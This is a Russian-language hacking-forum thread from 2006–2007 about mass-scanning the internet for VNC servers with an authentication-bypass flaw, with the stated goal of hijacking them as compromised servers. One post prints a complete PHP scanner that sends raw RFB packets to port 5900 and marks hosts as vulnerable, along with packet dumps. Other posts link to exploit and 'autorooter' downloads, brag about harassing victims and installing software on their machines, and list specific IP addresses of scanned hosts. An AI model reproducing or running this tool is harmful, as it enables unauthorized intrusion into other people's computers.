VNC bypass scanner ( проще говоря " добываем дедики" )

Discussion in 'Уязвимости' started by gemaglabin, 11 Sep 2006.

  1. gemaglabin

    gemaglabin Green member

    Joined:
    1 Aug 2006
    Messages:
    772
    Likes Received:
    842
    Reputations:
    1,369
    Скрипт для сканирования VNC на уязвимости

    Проще говоря VNC чтото вроде remote desktop,или радмина.Штука нешуточная и позволяет насканить много дедиков.

    С помощью Bl4ck-vnc-viewer можно приконектится к зараженным хостам. ( milw0rm.com/exploits/1791 )

    Если ошибки найдите скажите...

    http://www.mytempdir.com/923875
     
    #1 gemaglabin, 11 Sep 2006
    5 people like this.
  2. nerezus

    nerezus Banned

    Joined:
    12 Aug 2004
    Messages:
    3,191
    Likes Received:
    729
    Reputations:
    266
    Да вот только от рута ее не запускают... %)
    Да и пароля дефолтного нет, надо при первом запуске задавать.
    Да и реализаций разных десятки...
     
    #2 nerezus, 11 Sep 2006
  3. gemaglabin

    gemaglabin Green member

    Joined:
    1 Aug 2006
    Messages:
    772
    Likes Received:
    842
    Reputations:
    1,369
    Ну вообщем кто фишку не просек тот мягко говоря сосет ;)

    Посканив небольшую сетку я обнаружил несколько бажных VNC сервисов и смог неплохо поглумиться над юзерами + ничего не мешает поставить свой софт.

    Формат входных данных - лист из айпи адресов,вида 127.0.0.1-127.0.0.255 нельзя

    [​IMG]
     
    #3 gemaglabin, 12 Sep 2006
    1 person likes this.
  4. gemaglabin

    gemaglabin Green member

    Joined:
    1 Aug 2006
    Messages:
    772
    Likes Received:
    842
    Reputations:
    1,369
    Нуждаюсь в подобных сплоитах для Vnc демонов
     
    #4 gemaglabin, 15 Sep 2006
  5. forgotten

    forgotten New Member

    Joined:
    14 Sep 2006
    Messages:
    3
    Likes Received:
    1
    Reputations:
    0
    Кому надо - скрипт для генерации рандомных ip.
    http://www.nikitoz.org/gen.php

    Генерит ~9000 адрессов.
     
    #5 forgotten, 18 Sep 2006
  6. darky

    darky ♠ ♦ ♣ ♥

    Joined:
    18 May 2006
    Messages:
    1,773
    Likes Received:
    825
    Reputations:
    1,418
    ОС : WiNDoWs [ ALL ] *NiX
    Описание : Прога для генерирования списков IP адресов
    _http://ugas.fatal.ru/releases/IpGenerator.rar

    помогло )
     
    #6 darky, 18 Sep 2006
  7. Err0r

    Err0r New Member

    Joined:
    7 Nov 2006
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    А может всетаки подскажешь?
     
    #7 Err0r, 8 Nov 2006
  8. KSURi

    KSURi tnega AOLPS

    Joined:
    6 Jun 2006
    Messages:
    458
    Likes Received:
    219
    Reputations:
    357
    А что подсказать то?
    Гемин скрипт ищет бажные внцшки в который возможно обойти авторизацию.
    Обход производится с помощью модифицированного клиента внц.
    Или тебе тех подробности бага расписать?

    Уязвимость до сих пор актуальна. Просто надо правильно выбирать диапозоны для скана.

    ЗЫ: во избежание вопросов скажу что если после коннекта у вас появилась виндовая авторизация - ловить там практически нечего.

    ЗЗЫ: внц авторутер с сорцами:
    http://www.megaupload.com/it/?d=J1X2ETX9
     
    #8 KSURi, 8 Nov 2006
    Last edited: 8 Nov 2006
    2 people like this.
  9. Err0r

    Err0r New Member

    Joined:
    7 Nov 2006
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Да! ;)
    ну прсканил я сканером 674 компа 114 из них оказались is vulnerable

    А если такая авторизация*
    [​IMG]
    Спасибо!
     
    #9 Err0r, 9 Nov 2006
  10. KSURi

    KSURi tnega AOLPS

    Joined:
    6 Jun 2006
    Messages:
    458
    Likes Received:
    219
    Reputations:
    357
    Значит сервер патчен.
    А я просканил допесты компов и допесты из них vulnerable, что теперь?
    Снифай клиент оригинальный и патченный, потом сравнивай со спецификацией протокола
    Пожалуйста
     
    #10 KSURi, 9 Nov 2006
  11. Err0r

    Err0r New Member

    Joined:
    7 Nov 2006
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    KSURi - Спасибо, что разложил по полочкам и резжевал! =) РЕСПЕКТ!
     
    #11 Err0r, 9 Nov 2006
  12. Ksander

    Ksander Elder - Старейшина

    Joined:
    21 Jun 2006
    Messages:
    526
    Likes Received:
    260
    Reputations:
    138
    Перезалейте куда-то, не качает чего-то.
     
    #12 Ksander, 9 Nov 2006
  13. KSURi

    KSURi tnega AOLPS

    Joined:
    6 Jun 2006
    Messages:
    458
    Likes Received:
    219
    Reputations:
    357
    К сожалению копии геминого скрипта у меня нету, так что:
    win: http://www.milw0rm.com/sploits/05172006-VNC_bypauth-win32.rar
    nix based: http://www.milw0rm.com/sploits/05172006-VNC_bypauth-linux.tar.gz
     
    #13 KSURi, 9 Nov 2006
  14. Aerot1smo

    Aerot1smo Banned

    Joined:
    6 Jul 2006
    Messages:
    73
    Likes Received:
    10
    Reputations:
    -7
    а этот скрипт ещё работает,хочу попробывать надыбать дедиков себе?
     
    #14 Aerot1smo, 8 Feb 2007
  15. Kиt

    Kиt New Member

    Joined:
    4 Aug 2006
    Messages:
    0
    Likes Received:
    2
    Reputations:
    -3
    Перезалейте скрипт внс и внц авторутер с сорцами: плиз и какой порт на внц ?
     
    #15 Kиt, 2 Jul 2007
  16. _kREveDKo_

    _kREveDKo_ _kREveDKo_

    Joined:
    4 Dec 2005
    Messages:
    778
    Likes Received:
    620
    Reputations:
    1,040
    Перезалейте гемин скрипт
     
    #16 _kREveDKo_, 12 Jul 2007
  17. ettee

    ettee Administrator
    Staff Member

    Joined:
    12 Oct 2006
    Messages:
    466
    Likes Received:
    1,036
    Reputations:
    1,065
    Code:
    <?php

/**
 Made by gemaglabin ; underwater.cup.su
 Respectz : SkvoznoY,Bug(0)r,ZaCo,FUF,Cash
 #aol on ru.dal.net ; cup.su and antichat.ru
 try to connect vulnerable hosts with Bl4ck-VNC-Viewer
 milw0rm.com/exploits/1791
*/
  
# configure
define ( '_HELLO_PACKET', '524642203030332E3030380A');
set_time_limit(0);
ini_set("display_errors","0");

# loging...
function tpl_process($title,$color)
{
return <<<HTML
 <SCRIPT>
 with(document.getElementById('logarea'))
  {
   str = "$title";
   col = "$color"
   str = '<FONT FACE=TAHOMA><FONT SIZE=2><FONT COLOR=' + col + '>' + str + '</FONT></FONT></FONT>';
   innerHTML += innerHTML ? "<BR>\\n" + str : str;
    scrollTop += 14;
  }
  </SCRIPT>
HTML;
}


# main function
function Scan_Server ($aserver,$aport )
{ 
 global $fsock;
 $fsock  = fsockopen($aserver,(int) $aport,$errnum,$errstr,2 );
 if ($fsock) 
 {
  $res      = false;
  fread( $fsock,10 );
  # sending first packet named hello 
  $request  = pack("H*",_HELLO_PACKET);
  fwrite    ( $fsock,$request ); 
  fread( $fsock,10 );
  # sending second packet where we try to ayth without pass
  $request  = pack("H*","01");
  fwrite    ( $fsock,$request ); 
  # parsing responce for our auth packet
  $answer = fread( $fsock,10 );
  $answer = unpack("H*",$answer);
  if ($answer[1] = "00000000") $res = true;
  fclose ($fsock);
 }
 return $res;
}
 
  
SENDING HELLO PACKET 
0x0000   00 50 8B 0D 33 54 00 04-61 5B 86 D3 08 00 45 00   .P‹.3T..a[†У..E.
0x0010   00 5E C3 9B 00 00 DE 2F-09 B8 C0 A8 7C 63 0A 0A   .^Г›..Ю/.ёАЁ|c..
0x0020   C8 07 30 81 88 0B 00 3A-12 D6 00 00 38 98 00 00   И.0Ѓ?..:.Ц..8˜..
0x0030   3B 18 FF 03 00 21 45 00-00 36 C3 9A 40 00 DE 06   ;.я..!E..6Гљ@.Ю.
0x0040   0C 8C 0A 07 FF FE 51 38-71 5D 09 BC 17 0C 01 B9   .Њ..яюQ8q].ј...№
0x0050   1A B2 36 C6 DA 55 50 18-FF F3 27 D7 00 00 52 46   .І6ЖЪUP.яу'Ч..RF
0x0060   42 20 30 30 33 2E 30 30-38 0A 0D 0A               B 003.008...
 
 

0x0000   00 50 8B 0D 33 54 00 04-61 5B 86 D3 08 00 45 00   .P‹.3T..a[†У..E.
0x0010   00 51 DC A8 00 00 DE 2F-F0 B7 C0 A8 7C 63 0A 0A   .QЬЁ..Ю/р·АЁ|c..
0x0020   C8 07 30 81 88 0B 00 2D-12 D6 00 00 3F 8E 00 00   И.0Ѓ?..-.Ц..?Ћ..
0x0030   42 1A FF 03 00 21 45 00-00 29 DC A7 40 00 DE 06   B.я..!E..)Ь§@.Ю.
0x0040   F3 8B 0A 07 FF FE 51 38-71 5D 0A 58 17 0C F3 50   у‹..яюQ8q].X..уP
0x0050   85 8C 0F 43 D7 EF 50 18-FF F1 60 CA 00 00 01      …Њ.CЧпP.яс`К...
 
 

VULNERABLE SERVER
0x0000   00 04 61 5B 86 D3 00 50-8B 0D 33 54 08 00 45 00   ..a[†У.P‹.3T..E.
0x0010   00 54 EC D9 00 00 FA 2F-C4 83 0A 0A C8 07 C0 A8   .TмЩ..ъ/Дѓ..И.АЁ
0x0020   7C 63 30 81 88 0B 00 30-40 00 00 00 42 1B 00 00   |c0Ѓ[email protected]...
0x0030   3F 8E FF 03 00 21 45 00-00 2C 21 84 40 00 6B 06   ?Ћя..!E..,!„@.k.
0x0040   21 AD 51 38 71 5D 0A 07-FF FE 17 0C 0A 58 0F 43   !*Q8q]..яю...X.C
0x0050   D7 EF F3 50 85 8D 50 18-FF F2 61 C5 00 00 00 00   ЧпуP…ЌP.ятaЕ....
0x0060   00 00                                             ..

 
?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<HEAD>
<TITLE>VNC Auth Bypass Scaner &nbsp;&nbsp;&nbsp;&nbsp;cup.[su]</TITLE>
<STYLE TYPE="TEXT/CSS">
body{
	overflow: auto;
}

input, select, div {
	font: 11px tahoma, verdana, arial;
}
input.text, select {
	width: 100%;
}
fieldset {
	margin-bottom: 4px;
}

#header {
        font-size: 9px; 
        color: white; 
        padding: 4px;  
        background-color: #7A96DF;  
        font-family: tahoma;
        text-vertical: center;
}

</STYLE>
</HEAD>

<BODY BGCOLOR=#ECE9D8 TEXT=#000000>
<form name="check" method="post" action="?go">
<div style="background-color: #F4F3EE; margin: auto; border: 1px solid #919B9C; width: 318px;">
<div id="header">  
<a href="http://cup.su" style="color: white; text-decoration: none; font-weight: bold; background-color: #7A96DF;">
VNC Auth Bypass Scaner &nbsp;&nbsp;&nbsp;&nbsp;cup.[su]
</a>    
</div> 
<div style="background-color: #F4F3EE; width: 300px; font-size:11px; border: 1px solid #919B9C; margin: 4px; padding:4px;">
<td><textarea style="width: 297px; height: 300px; border: 1px solid #919B9C;WRAP:soft;" name="servers"></textarea></td><br><br>
<DIV ID=logarea STYLE="width: 97%; height: 140px; border: 1px solid #7F9DB9; padding: 3px; overflow: auto"></DIV></td>
</tr> 
<tr>
<td></td>
<tr>
<td></td>
<br>
<td><input class="text" type="submit" Value="Scan servers" style="width: 299px; margin: auto;"/></td>
</tr> 
</tr> 
</table>
</div>   
</div>      
</form>
</BODY>

<?php

if (isset($_POST['servers']))
{
 $_servers = $_POST['servers'];
 $servers  = explode("\r\n",$_servers);
 for ($i=0;$i<count($servers);$i++)
 {
   $host = $servers[$i];
   $port = "5900";
   $vuln = Scan_Server($host,$port);
   if (!$vuln) echo tpl_process("<b>$host is not vulnerable</b>","red");
   else echo tpl_process("<b>$host is vulnerable</b>","green");
 }
}

?>
     
    _________________________
    #17 ettee, 12 Jul 2007
    1 person likes this.
  18. THE_END

    THE_END Member

    Joined:
    29 Jul 2006
    Messages:
    16
    Likes Received:
    8
    Reputations:
    0
    Вот насканил пару но приконектитса к ним не могу иле пас просит иле исче какаето х*ин*я

    212.147.28.150
    213.147.108.35
    213.177.73.9
    213.176.142.73
    213.179.6.43
    213.192.200.249
    213.200.229.57
    213.210.5.24
    213.210.5.25
    213.210.5.14
    213.210.5.15
    213.210.5.20
    213.233.112.69
    213.221.55.226
     
    #18 THE_END, 2 Oct 2007
  19. te$t

    te$t Elder - Старейшина

    Joined:
    8 Aug 2007
    Messages:
    38
    Likes Received:
    35
    Reputations:
    5
    хы дядя, елиб ты пользовался багой примерно год назад,
    то наверное тебе бы удалось, чтонидь отловить. А сейчас для добычи дедика нужно перелопатить весь сегмент какой либо страны... К примеру недавно в Австралии поймал пару дедиков W2003. Попробуй приконеткится через метасплоет, у меня иногда прокатывает...
     
    #19 te$t, 11 Oct 2007
  20. Lancellot

    Lancellot Member

    Joined:
    9 Aug 2006
    Messages:
    138
    Likes Received:
    23
    Reputations:
    7
    Ссорь за тупой вопрос но как запустить этот скрипт,с какими параметрами и что должно быть розришено на шелле?
    И как там ставить диапазон?
    --
    заранее спс
     
    #20 Lancellot, 20 Oct 2007
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.